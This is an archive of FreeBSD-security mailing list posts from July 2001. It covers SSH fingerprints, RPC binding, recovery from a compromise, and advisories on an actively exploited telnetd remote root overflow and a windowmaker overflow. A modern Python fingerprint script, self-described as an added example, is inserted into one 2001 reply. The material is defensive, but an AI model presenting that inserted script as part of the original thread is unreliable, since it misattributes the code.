> 1024 fc:1f:cf:8c:5c:dc:10:d7:80:21:a3:cc:3b:b2:9f:9d root@ringworld.office1.bg
> [root@ringworld:v3 ~]#
>
> Seems to work OK for the RSA host key..
> This is on a -stable rebuilt today:
>
> [root@ringworld:v3 ~]# ssh -V
> SSH Version OpenSSH_2.3.0 green@FreeBSD.org 20010321, protocol versions 1.5/2.0.
> Compiled with SSL (0x0090601f).

peter, as always, you are right. this works only for rsa keys. my fault ;-)

/k

--
> "Her figure described a set of parabolas that could cause cardiac arrest
> in a yak." --Woody Allen
KR433/KR11-RIPE -- WebMonster Community Founder -- nGENn GmbH Senior Techie
http://www.webmonster.de/ -- ftp://ftp.webmonster.de/ -- http://www.ngenn.net/
karsten&rohrbach.de -- alpha&ngenn.net -- alpha&scene.org -- catch@spam.de
GnuPG 0x2964BF46 2001-03-15 42F9 9FFF 50D4 2F38 DBEE DF22 3340 4F4E 2964 BF46
Please do not remove my address from To: and Cc: fields in mailing lists.
10x

From owner-freebsd-security Fri Jul 27 9:35:31 2001
Date: Fri, 27 Jul 2001 18:29:27 +0200 (CEST)
From: gdef@polychrome.durny.com
Subject: RPC opens ports on all aliases
Hi,

Is there any possibility to make RPC services open TCP ports only on a specified IP address? I modified the portmap source to open TCP port 111 only on the given IP. But services, e.g. nfs, still open ports on all IPs.

Any solution?

Defio

From owner-freebsd-security Fri Jul 27 9:54:09 2001
Date: Fri, 27 Jul 2001 19:53:08 +0300
From: Peter Pentchev
To: gdef@polychrome.durny.com
Cc: freebsd-security@FreeBSD.org
Subject: Re: RPC opens ports on all aliases
Message-ID: <20010727195308.D1105@ringworld.oblivion.bg>

On Fri, Jul 27, 2001 at 06:29:27PM +0200, gdef@polychrome.durny.com wrote:
>
> Hi,
>
> Is there any possibility to make RPC services open TCP ports only on a
> specified IP address? I modified the portmap source to open TCP port 111 only
> on the given IP. But services, e.g. nfs, still open ports on all IPs.
>
> Any solution?

Yes; provide the necessary command-line options to the various servers. For example, the nfsd(8) manual page documents a -h option, which specifies an IP address to bind to. The portmap(8) manual page also documents an -h option.

You can pass command-line options to the servers on startup by adding the corresponding variable definitions in your /etc/rc.conf file. You can see all the available variables by either reading the rc.conf(5) manual page, or looking through the /etc/defaults/rc.conf file.

DO NOT modify the /etc/defaults/rc.conf file! Simply reassign the variables you need in /etc/rc.conf.

For portmap(8) and nfsd(8), the appropriate variables are portmap_flags and nfs_server_flags.

G'luck,
Peter

--
If this sentence didn't exist, somebody would have invented it.

From owner-freebsd-security Fri Jul 27 10:06:35 2001
Date: Fri, 27 Jul 2001 13:06:12 -0400 (EDT)
From: "Andrew R. Reiter"
To: kris@obsecurity.org
Cc: freebsd-security@freebsd.org
Subject: inetd.conf -- IPv6 telnet

kris,

just wondering about this thing i just noticed in 4-stable that telnet comes default running under IPv6 in inetd.conf. not sure how likely someone would exploit over IPv6, but i was wondering about consistency in relation to what's being done already for IPv4?

Andrew

*-------------..................................................
| Andrew R. Reiter
| arr@fledge.watson.org
| "It requires a very unusual mind
| to undertake the analysis of the obvious" -- A.N. Whitehead

From owner-freebsd-security Fri Jul 27 10:09:34 2001
Date: Fri, 27 Jul 2001 10:09:27 -0700
From: Dima Dorfman
To: Peter Pentchev
Cc: "Karsten W. Rohrbach", Scott Johnson, freebsd-security@freebsd.org
Subject: Re: ssh_host_dsa_key fingerprint
Message-Id: <20010727170932.53D803E31@bazooka.unixfreak.org>
In-Reply-To: <20010727182433.A1105@ringworld.oblivion.bg>

Peter Pentchev writes:
> On Fri, Jul 27, 2001 at 05:04:48PM +0200, Karsten W. Rohrbach wrote:
> > man ssh-keygen(1):
> >
> > -l      Show fingerprint of specified private or public key file.
>
> Does this work for DSA though?

Yes, with newer versions of OpenSSH, such as the one in -current.
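The fingerprint that `ssh-keygen -l` prints is just the MD5 of the raw key blob (the base64 field of the .pub file), so it can be computed for a DSA host key even where the OpenSSH 2.3.0 ssh-keygen in this thread refuses the file. The script below is an added example, not code from the thread or from OpenSSH; it handles both ssh-rsa and ssh-dss public keys, the key parameters in it are constructed stand-ins rather than real keys, and `parse_pubkey_line`, `make_pub_line` and `fingerprint_file` are the example's own names.

```python
"""Fingerprint an OpenSSH public key the way `ssh-keygen -l` does.

Added example (not from the thread or OpenSSH): `ssh-keygen -l` prints
`<bits> <fingerprint> <comment>`, where the fingerprint is the MD5 of the
raw key blob shown as 16 colon-separated hex bytes.  The same computation
works for ssh-dss keys, which older ssh-keygen versions rejected.
"""
import base64
import binascii
import hashlib
import struct


def _read_string(blob, off):
    """Decode one SSH wire 'string' (uint32 big-endian length + bytes)."""
    if off + 4 > len(blob):
        raise ValueError("truncated key blob")
    (n,) = struct.unpack(">I", blob[off:off + 4])
    off += 4
    if off + n > len(blob):
        raise ValueError("truncated key blob")
    return blob[off:off + n], off + n


def _mpint(n):
    """Encode a non-negative integer as an SSH mpint (RFC 4251, section 5)."""
    raw = n.to_bytes((n.bit_length() + 7) // 8, "big") if n else b""
    if raw and raw[0] & 0x80:
        raw = b"\x00" + raw          # keep the sign bit clear for positives
    return struct.pack(">I", len(raw)) + raw


def fingerprint_md5(blob):
    """Legacy colon-hex MD5 fingerprint, as ssh-keygen -l printed in 2001."""
    return ":".join("%02x" % b for b in hashlib.md5(blob).digest())


def fingerprint_sha256(blob):
    """Modern form (unpadded base64 of SHA-256), for comparison."""
    digest = hashlib.sha256(blob).digest()
    return "SHA256:" + base64.b64encode(digest).decode("ascii").rstrip("=")


def parse_pubkey_line(line):
    """Parse one .pub line into key type, size, comment and fingerprints."""
    fields = line.strip().split(None, 2)
    if len(fields) < 2:
        raise ValueError("expected '<type> <base64 blob> [comment]'")
    keytype, b64 = fields[0], fields[1]
    comment = fields[2] if len(fields) == 3 else ""
    try:
        blob = base64.b64decode(b64, validate=True)
    except binascii.Error as exc:
        raise ValueError("key blob is not valid base64") from exc

    wire_type, off = _read_string(blob, 0)
    if wire_type.decode("ascii", "replace") != keytype:
        raise ValueError("key type field does not match blob")

    # The size ssh-keygen reports is the bit length of the RSA modulus n
    # or of the DSA prime p (the first mpint after the type string).
    if keytype == "ssh-rsa":
        _e, off = _read_string(blob, off)      # public exponent e
        n, off = _read_string(blob, off)       # modulus n
        bits = int.from_bytes(n, "big").bit_length()
    elif keytype == "ssh-dss":
        p, off = _read_string(blob, off)       # p; q, g, y follow
        bits = int.from_bytes(p, "big").bit_length()
    else:
        raise ValueError("unsupported key type %r" % keytype)

    return {"type": keytype, "bits": bits, "comment": comment,
            "md5": fingerprint_md5(blob), "sha256": fingerprint_sha256(blob)}


def make_pub_line(keytype, params, comment):
    """Assemble a .pub line from a key type and its integer parameters."""
    blob = struct.pack(">I", len(keytype)) + keytype.encode("ascii")
    blob += b"".join(_mpint(x) for x in params)
    return "%s %s %s" % (keytype, base64.b64encode(blob).decode("ascii"), comment)


# Constructed parameters of realistic size (p and n: 1024 bits, q: 160 bits).
# They are not primes and not a usable key pair; they only exercise the parser.
SAMPLE_DSS_LINE = make_pub_line(
    "ssh-dss", [2**1023 + 1234567, 2**159 + 3, 2, 2**1000 + 5], "root@host.example")
SAMPLE_RSA_LINE = make_pub_line("ssh-rsa", [65537, 2**1023 + 99], "root@host.example")


def fingerprint_file(path):
    """Fingerprint the first key in a .pub file (e.g. ssh_host_dsa_key.pub)."""
    with open(path) as fh:
        return parse_pubkey_line(fh.readline())


if __name__ == "__main__":
    for line in (SAMPLE_DSS_LINE, SAMPLE_RSA_LINE):
        info = parse_pubkey_line(line)
        print(info["bits"], info["md5"], info["comment"], "(%s)" % info["type"])
```

Point `fingerprint_file` at the public half of the host key (the `.pub` file next to /etc/ssh/ssh_host_dsa_key); the private key file is never read.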
From owner-freebsd-security Fri Jul 27 10:11:14 2001
Date: Fri, 27 Jul 2001 12:16:16 -0500
From: Jon Loeliger
To: "Antoine Beaupre (LMC)"
Cc: security@freebsd.org
Subject: Re: Some Followup on that ypchfn mess of mine
Message-Id: <200107271716.MAA15378@chrome.jdl.com>
In-reply-to: Your message of "Fri, 27 Jul 2001 09:38:24 EDT." <3B616ED0.8050808@lmc.ericsson.se>

So, like "Antoine Beaupre (LMC)" was saying to me just the other day:
> Hi.
>
> Sorry to be a pain, but you really should kill this machine. Just backup
> your data, format the drive and reinstall from trusted source.
>
> You can't just keep playing around this box and expect to fix
> everything. Unless you already had some IDS such as tripwire, it's
> almost impossible.
>
> Reinstall. It's for your own good. :)
>
> A.

OK, I'll state it publicly:

This machine will be rebuilt from sources.
The old disk will be completely reformatted.
I'm putting a new firewall in place first.

jdl

From owner-freebsd-security Fri Jul 27 10:26:32 2001
Date: Fri, 27 Jul 2001 20:25:27 +0300
From: Peter Pentchev
To: Jon Loeliger
Cc: "Antoine Beaupre (LMC)", security@freebsd.org
Subject: Re: Some Followup on that ypchfn mess of mine
Message-ID: <20010727202527.E1105@ringworld.oblivion.bg>
In-Reply-To: <200107271716.MAA15378@chrome.jdl.com>

On Fri, Jul 27, 2001 at 12:16:16PM -0500, Jon Loeliger wrote:
> So, like "Antoine Beaupre (LMC)" was saying to me just the other day:
> > Hi.
> >
> > Sorry to be a pain, but you really should kill this machine. Just backup
> > your data, format the drive and reinstall from trusted source.
> >
> > You can't just keep playing around this box and expect to fix
> > everything. Unless you already had some IDS such as tripwire, it's
> > almost impossible.
> >
> > Reinstall. It's for your own good. :)
> >
> > A.
>
> OK, I'll state it publicly:
>
> This machine will be rebuilt from sources.
> The old disk will be completely reformatted.
> I'm putting a new firewall in place first.

Sorry to be a pain ;)

But sometimes, a rebuild from sources might not be enough: you'll have to perform at least the install on the machine in question (unless you take off the hard disk, mount it on another machine, build from sources, and install with a DESTDIR pointing to this machine's filesystems). This still poses a risk, albeit unlikely, of somebody having compromised your compiler, make(1), install(1), perl, and whatever else is running on the machine before the installation starts using the newly-compiled binaries.

This is why I - following the advice of others, including http://www.FreeBSD.org/security/ - recommended backing up the data, then reinstalling from a CD (or over the net; the point is, reinstalling from an install medium completely unrelated to the compromised machine).

G'luck,
Peter

--
Do you think anybody has ever had *precisely this thought* before?

From owner-freebsd-security Fri Jul 27 10:41:52 2001
Date: Fri, 27 Jul 2001 19:42:10 +0200 (CEST)
From: "Janusz Mucka (Defacto)"
To: Peter Pentchev
Subject: Re: RPC opens ports on all aliases
In-Reply-To: <20010727195308.D1105@ringworld.oblivion.bg>

Yes, I know about that.
portmap_flags="-h 10.10.10.1" nfs_server_enable="YES" nfs_server_flags="-u -n 1 -h 10.10.10.1" No effect. There are still open TCP ports on all aliases Defio > Yes; provide the necessary command-line options to the various servers. > For example, the nfsd(8) manual page documents a -h option, which > specifies an IP address to bind to. The portmap(8) manual page also > documents an -h option. > > You can pass command-line options to the servers on startup by > adding the corresponding variable definitions in your /etc/rc.conf file. > You can see all the available variables by either reading the rc.conf(5) > manual page, or looking through the /etc/defaults/rc.conf file. > > DO NOT modify the /etc/defaults/rc.conf file! Simply reassign > the variables you need in /etc/rc.conf. > > For portmap(8) and nfsd(8), the appropriate variables are > portmap_flags and nfs_server_flags. > > G'luck, > Peter > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jul 27 11:19:13 2001 Delivered-To: freebsd-security@freebsd.org Received: from cvd.pl (cvd.pl [213.25.82.2]) by hub.freebsd.org (Postfix) with ESMTP id CD21037B403 for ; Fri, 27 Jul 2001 11:19:10 -0700 (PDT) (envelope-from gdef@cvd.pl) Received: by cvd.pl (Postfix, from userid 1005) id F11E413FB21; Fri, 27 Jul 2001 20:21:04 +0200 (CEST) Received: from localhost (localhost [127.0.0.1]) by cvd.pl (Postfix) with ESMTP id E34EEF6129 for ; Fri, 27 Jul 2001 20:21:04 +0200 (CEST) Date: Fri, 27 Jul 2001 20:21:04 +0200 (CEST) From: "Janusz Mucka (Defacto)" To: Subject: identd with NAT support Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi, Is there any implementation od identd which support identd on NAT like oidentd does. 
How to assign idents to windows machines through nat like oidentd does? Defio To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jul 27 11:39:12 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-64-169-104-149.dsl.lsan03.pacbell.net [64.169.104.149]) by hub.freebsd.org (Postfix) with ESMTP id 4FBFF37B403 for ; Fri, 27 Jul 2001 11:39:09 -0700 (PDT) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id 4E9B266E94; Fri, 27 Jul 2001 11:39:08 -0700 (PDT) Date: Fri, 27 Jul 2001 11:39:08 -0700 From: Kris Kennaway To: Matthew Emmerton Cc: security@FreeBSD.ORG Subject: Re: problem with telnetd patch Message-ID: <20010727113907.B31276@xor.obsecurity.org> References: <005301c1168f$cc478c60$1200a8c0@gsicomp.on.ca> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="NMuMz9nt05w80d4+" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <005301c1168f$cc478c60$1200a8c0@gsicomp.on.ca>; from matt@gsicomp.on.ca on Fri, Jul 27, 2001 at 07:32:20AM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --NMuMz9nt05w80d4+ Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Fri, Jul 27, 2001 at 07:32:20AM -0400, Matthew Emmerton wrote: > [ please cc, not on security- ] >=20 > Folks, >=20 > I just updated one of my client's machines to RELENG_4_3, and attempted to > update telnetd. >=20 > I used: >=20 > cd /usr/src/secure/libexec/telnetd > make depend && make all install >=20 > which failed, complaining of unresolved Kerberos symbols. 
>
> To fix the problem, I had to add ${LIBKRB} and ${LIBCOM_ERR} to the DPADD
> line of the Makefile, and -lkrb and -lcom_err to the LDADD line of the
> Makefile.
>
> The machine that I was upgrading was a clean install of 4.3-REL from a few
> months ago, no cvsup's of any source since then. Any ideas why I was
> running into this problem?

You had previously built the kerberosIV telnetd and it was picking up the copy of libtelnet.a which it bogusly installs into /usr/lib. This was overlooked in the initial advisory.

Kris

From owner-freebsd-security Fri Jul 27 11:40:34 2001
Date: Fri, 27 Jul 2001 11:40:30 -0700
From: Kris Kennaway
To: "Andrew R. Reiter"
Cc: kris@obsecurity.org, freebsd-security@freebsd.org
Subject: Re: inetd.conf -- IPv6 telnet
Message-ID: <20010727114029.C31276@xor.obsecurity.org>

On Fri, Jul 27, 2001 at 01:06:12PM -0400, Andrew R. Reiter wrote:
> kris,
>
> just wondering about this thing i just noticed in 4-stable that telnet
> comes default running under IPv6 in inetd.conf. not sure how likely
> someone would exploit over IPv6, but i was wondering about consistency in
> relation to what's being done already for IPv4?

What do you mean by 'consistency'? It's the same source code (hence already fixed), and the advisory mentioned disabling both ipv4 and ipv6 telnetd services as a workaround.
Kris

From owner-freebsd-security Fri Jul 27 12:13:03 2001
Date: Fri, 27 Jul 2001 14:12:59 -0500 (CDT)
From: Frank Tobin
To: "Janusz Mucka (Defacto)"
Subject: Re: identd with NAT support

Janusz Mucka (Defacto), at 20:21 +0200 on Fri, 27 Jul 2001, wrote:

> Is there any implementation of identd which supports identd on NAT like
> oidentd does? How to assign idents to Windows machines through NAT like
> oidentd does?

Take a look at applying some of the "auth" options for inetd on the gateway. Search for "auth" in the inetd manpage.
--
Frank Tobin
http://www.uiuc.edu/~ftobin/

From owner-freebsd-security Fri Jul 27 12:29:33 2001
Date: Fri, 27 Jul 2001 15:29:21 -0400 (EDT)
From: "Andrew R. Reiter"
To: Kris Kennaway
Cc: freebsd-security@freebsd.org
Subject: Re: inetd.conf -- IPv6 telnet
In-Reply-To: <20010727114029.C31276@xor.obsecurity.org>

Consistency in terms of inetd.conf #'ing out telnet from being started; this is completely disregarding what has occurred lately from the vulnerability. In inetd.conf, it comments the ipv4 telnetd so it won't be started (by default). But in ipv6 telnetd, it does not... Just wondering about some consistency with that.

On Fri, 27 Jul 2001, Kris Kennaway wrote:
> On Fri, Jul 27, 2001 at 01:06:12PM -0400, Andrew R. Reiter wrote:
> > kris,
> >
> > just wondering about this thing i just noticed in 4-stable that telnet
> > comes default running under IPv6 in inetd.conf. not sure how likely
> > someone would exploit over IPv6, but i was wondering about consistency in
> > relation to what's being done already for IPv4?
>
> What do you mean by 'consistency'? It's the same source code (hence
> already fixed), and the advisory mentioned disabling both ipv4 and
> ipv6 telnetd services as a workaround.
>
> Kris
>

*-------------.................................................
| Andrew R. Reiter
| arr@fledge.watson.org
| "It requires a very unusual mind
| to undertake the analysis of the obvious" -- A.N. Whitehead

From owner-freebsd-security Fri Jul 27 12:37:39 2001
Date: Fri, 27 Jul 2001 12:37:31 -0700
From: Kris Kennaway
To: "Andrew R. Reiter"
Cc: Kris Kennaway, freebsd-security@freebsd.org
Subject: Re: inetd.conf -- IPv6 telnet
Message-ID: <20010727123727.A46663@xor.obsecurity.org>
References: <20010727114029.C31276@xor.obsecurity.org>

On Fri, Jul 27, 2001 at 03:29:21PM -0400, Andrew R. Reiter wrote:
>
> consistency in terms of inetd.conf #'ing out telnet from being started,
> this is completely disregarding what has occurred lately from the
> vulnerability.
>
> in inetd.conf, it comments the ipv4 telnetd so it won't be started (by
> default). But in ipv6 telnetd, it does not... Just wondering about some
> consistency with that.

I show both of them uncommented by default, and the advisory tells you to comment both out.

Kris

From owner-freebsd-security Fri Jul 27 13:01:05 2001
Date: Fri, 27 Jul 2001 13:00:28 -0700 (PDT)
Message-Id: <200107272000.f6RK0SJ17592@freefall.freebsd.org>
From: FreeBSD Security Advisories
To: FreeBSD Security Advisories
Subject: FreeBSD Security Advisory FreeBSD-SA-01:49.telnetd [REVISED]
Reply-To: security-advisories@FreeBSD.org

=============================================================================
FreeBSD-SA-01:49                                            Security Advisory
                                                                FreeBSD, Inc.
Topic:          telnetd contains remote buffer overflow

Category:       core
Module:         telnetd
Announced:      2001-07-23
Revised:        2001-07-27
Credits:        Sebastian
Affects:        All releases of FreeBSD 3.x, 4.x prior to 4.4,
                FreeBSD 4.3-STABLE prior to the correction date
Corrected:      2001-07-23
FreeBSD only:   NO

0.   Revision History

2001-07-23  v1.0  Initial release
2001-07-27  v1.1  Updated patch instructions, kerberosIV package available,
                  added reference to SSH in workarounds.

I.   Background

telnetd is the server for the telnet remote virtual terminal protocol.

II.  Problem Description

An overflowable buffer was found in the version of telnetd included with FreeBSD. Due to incorrect bounds checking of data buffered for output to the remote client, an attacker can cause the telnetd process to overflow the buffer and crash, or execute arbitrary code as the user running telnetd, usually root. A valid user account and password are not required to exploit this vulnerability, only the ability to connect to a telnetd server.

The telnetd service is enabled by default on all FreeBSD installations if the 'high' security setting is not selected at install-time.

This vulnerability is known to be exploitable, and is being actively exploited in the wild.

All released versions of FreeBSD prior to the correction date including 3.5.1-RELEASE and 4.3-RELEASE are vulnerable to this problem. It was corrected prior to the forthcoming release of 4.4-RELEASE.

III. Impact

Remote users can cause arbitrary code to be executed as the user running telnetd, usually root.

IV.  Workaround

1) Disable the telnet service, which is usually run out of inetd: comment out the following lines in /etc/inetd.conf, if present.
telnet  stream  tcp     nowait  root    /usr/libexec/telnetd    telnetd
telnet  stream  tcp6    nowait  root    /usr/libexec/telnetd    telnetd

and execute the following command as root:

# kill -HUP `cat /var/run/inetd.pid`

An alternative remote login protocol such as the SSH secure shell protocol (which is installed by default in FreeBSD) can be used instead. The SSH protocol is the recommended protocol for remote logins to FreeBSD systems because of the superior authentication, confidentiality and integrity protection it supplies relative to other protocols such as telnet.

2) Impose access restrictions using TCP wrappers (/etc/hosts.allow), or a network-level packet filter such as ipfw(8) or ipf(8) on the perimeter firewall or the local machine, to limit access to the telnet service to trusted machines.

V.   Solution

One of the following:

1) Upgrade your vulnerable FreeBSD system to 4.3-STABLE or the RELENG_4_3 security branch after the respective correction dates.

2) FreeBSD 3.5.1, 4.x systems prior to the correction date:

There are two versions of the patch available, for systems with and without the /usr/src/crypto/telnet sources. To determine whether your system has the crypto-telnet sources installed, perform the following command:

# ls /usr/src/crypto/telnet/telnetd

A response of

ls: /usr/src/crypto/telnet/telnetd: No such file or directory

indicates you do not have the crypto sources present and should download the non-crypto-telnet patch: see section 2b) below.

These patches have been verified to apply to FreeBSD 4.2-RELEASE, 4.3-RELEASE and 3.5.1-STABLE dated prior to 2001-07-20 (users of 3.5.1-RELEASE must have applied the patches from FreeBSD Security Advisory 00:69 prior to applying this patch). These patches may or may not apply to older, unsupported releases of FreeBSD.

2a) For systems with the crypto-telnet sources installed

Under FreeBSD 4.x, the crypto-telnet client can be built in two versions: with or without support for the KerberosIV authentication system.
Under FreeBSD 3.x there is only one way to build the crypto-telnet client: with KerberosIV support.

To determine whether your system has the kerberosIV distribution installed, perform the following command:

# ls /usr/lib/libkrb.a

Possible responses:

/usr/lib/libkrb.a
    # This response indicates you have kerberosIV present

ls: /usr/lib/libkrb.a: No such file or directory
    # This response indicates you do not have kerberosIV present

Download the patch and the detached PGP signature from the following locations, and verify the signature using your PGP utility.

ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-01:49/telnetd-crypto.patch
ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-01:49/telnetd-crypto.patch.asc

2aa) For systems with the crypto-telnet sources installed but without KerberosIV installed

[FreeBSD 4.x systems]

# cd /usr/src/
# patch -p < /path/to/patch
# cd /usr/src/secure/lib/libtelnet
# make depend && make all
# cd /usr/src/secure/libexec/telnetd
# make depend && make all install

[FreeBSD 3.x systems]

# cd /usr/src/
# patch -p < /path/to/patch
# cd /usr/src/lib/libtelnet
# make depend && make all
# cd /usr/src/libexec/telnetd
# make depend && make all install

2ab) For systems with the crypto-telnet sources installed and with KerberosIV installed

# cd /usr/src/
# patch -p < /path/to/patch
# cd /usr/src/kerberosIV/lib/libtelnet
# make depend && make all
# cd /usr/src/kerberosIV/libexec/telnetd
# make depend && make all install

2b) For systems without the crypto-telnet sources installed

Download the patch and the detached PGP signature from the following locations, and verify the signature using your PGP utility.
ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-01:49/telnetd.patch
ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-01:49/telnetd.patch.asc

# cd /usr/src/
# patch -p < /path/to/patch
# cd /usr/src/lib/libtelnet
# make depend && make all
# cd /usr/src/libexec/telnetd
# make depend && make all install

3) FreeBSD 4.3-RELEASE systems:

An experimental upgrade package is available for users who wish to provide testing and feedback on the binary upgrade process. This package may be installed on FreeBSD 4.3-RELEASE systems only, and is intended for use on systems for which source patching is not practical or convenient. If you use the upgrade package, feedback (positive or negative) to security-officer@FreeBSD.org is requested so we can improve the process for future advisories.

During the installation procedure, backup copies are made of the files which are replaced by the package. These backup copies will be reinstalled if the package is removed, reverting the system to a pre-patched state.

Three versions of the upgrade package are available, depending on whether or not the system has the crypto or kerberosIV distributions installed.
To determine whether your system has the crypto distribution installed, perform the following command:

# ls /usr/bin/openssl

Possible responses:

/usr/bin/openssl
    # This response indicates you have crypto present

ls: /usr/bin/openssl: No such file or directory
    # This response indicates you do not have crypto present

To determine whether your system has the kerberosIV distribution installed, perform the following command:

# ls /usr/lib/libkrb.a

Possible responses:

/usr/lib/libkrb.a
    # This response indicates you have kerberosIV present

ls: /usr/lib/libkrb.a: No such file or directory
    # This response indicates you do not have kerberosIV present

3a) If crypto is present

# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/packages/SA-01:49/security-patch-telnetd-crypto-01.49.tgz
# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/packages/SA-01:49/security-patch-telnetd-crypto-01.49.tgz.asc

Verify the detached PGP signature using your PGP utility.

# pkg_add security-patch-telnetd-crypto-01.49.tgz

3b) If kerberosIV is present

# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/packages/SA-01:49/security-patch-telnetd-kerberosIV-01.49.tgz
# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/packages/SA-01:49/security-patch-telnetd-kerberosIV-01.49.tgz.asc

Verify the detached PGP signature using your PGP utility.

# pkg_add security-patch-telnetd-kerberosIV-01.49.tgz

3c) If neither crypto nor kerberosIV is present

# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/packages/SA-01:49/security-patch-telnetd-01.49.tgz
# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/packages/SA-01:49/security-patch-telnetd-01.49.tgz.asc

Verify the detached PGP signature using your PGP utility.
# pkg_add security-patch-telnetd-01.49.tgz

From owner-freebsd-security Fri Jul 27 13:20:51 2001
Date: Fri, 27 Jul 2001 13:20:36 -0700 (PDT)
Message-Id: <200107272020.f6RKKaH25447@freefall.freebsd.org>
From: FreeBSD Security Advisories
To: FreeBSD Security Advisories
Subject: FreeBSD Security Advisory FreeBSD-SA-01:50.windowmaker
Reply-To: security-advisories@FreeBSD.org

=============================================================================
FreeBSD-SA-01:50                                            Security Advisory
                                                                FreeBSD, Inc.

Topic:          windowmaker contains possibly exploitable buffer overflow

Category:       ports
Module:         windowmaker/windowmaker-i18n
Announced:      2001-07-27
Credits:        Robert Marshall
Affects:        Ports collection prior to the correction date.
Corrected:      2001-07-24
Vendor status:  Updated version released
FreeBSD only:   NO

I.   Background

Windowmaker is a GNUstep-compliant X11 window manager which emulates the NeXTSTEP interface.

II.  Problem Description

The windowmaker ports, versions prior to windowmaker-0.65.0_2 and windowmaker-i18n-0.65.0_1, contain a potentially exploitable buffer overflow when displaying a very long window title in the window list menu. Since programs such as web browsers will include the contents of a webpage's title tag in window titles, this problem may allow authors of malicious webpages to cause windowmaker to crash and potentially execute arbitrary code as the user running windowmaker.

The windowmaker ports are not installed by default, nor are they "part of FreeBSD" as such: they are part of the FreeBSD ports collection, which contains over 5500 third-party applications in a ready-to-install format. The ports collection shipped with FreeBSD 4.3 is vulnerable to this problem since it was discovered after its release.

FreeBSD makes no claim about the security of these third-party applications, although an effort is underway to provide a security audit of the most security-critical ports.

III. Impact

Under certain circumstances, remote webservers may cause windowmaker to crash and potentially execute arbitrary code as the user running windowmaker.

If you have not chosen to install the windowmaker port/package, then your system is not vulnerable to this problem.

IV.  Workaround

Deinstall the windowmaker package if you have installed it.

V.   Solution

One of the following:

1) Upgrade your entire ports collection and rebuild the windowmaker or windowmaker-i18n port.
2) Deinstall the old package and install a new package dated after the correction date, obtained from the following directories:

[i386]
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/x11-wm/windowmaker-0.65.1.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/x11-wm/windowmaker-0.65.1.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/x11-wm/windowmaker-i18n-0.65.0_1.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/x11-wm/windowmaker-i18n-0.65.0_1.tgz

[alpha]
Packages are not automatically generated for the alpha architecture at this time due to lack of build resources.

3) Download a new port skeleton for the windowmaker or windowmaker-i18n port from:

http://www.freebsd.org/ports/

and use it to rebuild the port.

4) Use the portcheckout utility to automate option (3) above. The portcheckout port is available in /usr/ports/devel/portcheckout or the package can be obtained from:

ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/devel/portcheckout-2.0.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/devel/portcheckout-2.0.tgz

From owner-freebsd-security Fri Jul 27 14:01:10 2001
Date: Fri, 27 Jul 2001 23:51:53 +0300
From: Alex Popa
To: FreeBSD Security Advisories
Subject: Re: FreeBSD Security Advisory FreeBSD-SA-01:50.windowmaker
Message-ID: <20010727235153.A21221@ldc.ro>
In-Reply-To: <200107272020.f6RKKaH25447@freefall.freebsd.org>

Something tells me this should be a FreeBSD Ports Security Advisory.
                                            ^^^^^
Unless this has changed so much since I *really* read this list.

Have Fun!

Alex

------------+------------------------------------------
Alex Popa,  | "Artificial Intelligence is
razor@ldc.ro| no match for Natural Stupidity"
------------+------------------------------------------
"It took the computing power of three C-64s to fly to the Moon.
It takes a 486 to run Windows 95. Something is wrong here."
From owner-freebsd-security Fri Jul 27 14:03:04 2001
Date: Fri, 27 Jul 2001 15:02:56 -0600 (MDT)
From: Paul Hart
To: Nuno Teixeira
Subject: Re: Updating security fixes without single user mode?
In-Reply-To: <20010726015730.F5227@gateway.bogus>

On Thu, 26 Jul 2001, Nuno Teixeira wrote:

> The problem is that my server is at US and I live in Portugal! So,
> it's impossible to run the system in single user mode.

Isn't that the most compelling reason to use the serial console support in FreeBSD?

Paul Hart

--
Paul Robert Hart        hart@orem.verio.net
Jul ner lbh ernqvat guvf?
From owner-freebsd-security Fri Jul 27 14:18:15 2001
Date: Fri, 27 Jul 2001 15:18:11 -0600 (MDT)
From: Paul Hart
To: Jim Sander
Subject: Re: Telnet exploit & 3.4-RELEASE

On Thu, 26 Jul 2001, Jim Sander wrote:

> Telnet definitely functions, and the exploit doesn't seem to succeed-
> but then it didn't work before either, so who knows for sure.

The exploit posted to Bugtraq DOES work on FreeBSD 3.4-RELEASE but only if you selected to install an encrypting telnetd when you set the machine up. At installation time there is a prompt about whether you want to install DES software. If you select "Yes" and install the "krb" package you'll get a telnetd that understands using encryption, but unfortunately for you it's the exploitable one.

